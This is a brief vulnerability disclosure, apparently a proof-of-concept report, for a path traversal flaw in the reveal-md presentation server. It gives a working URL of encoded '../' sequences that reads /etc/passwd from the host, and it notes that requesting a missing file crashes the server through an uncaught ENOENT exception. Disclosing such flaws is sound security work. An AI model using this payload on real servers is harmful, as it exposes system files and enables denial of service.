Run an instance of reveal-md (from source code or docker hub), and then reach the following URL :

http://localhost:1948/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc.md%2F..%2Fetc%2Fpasswd

This will leak /etc/passwd of local machine (or docker)

Moreover, if we try to reach a non-existent file, the server will crash because there is no catch for the exception "ENOENT" (no such file or directory).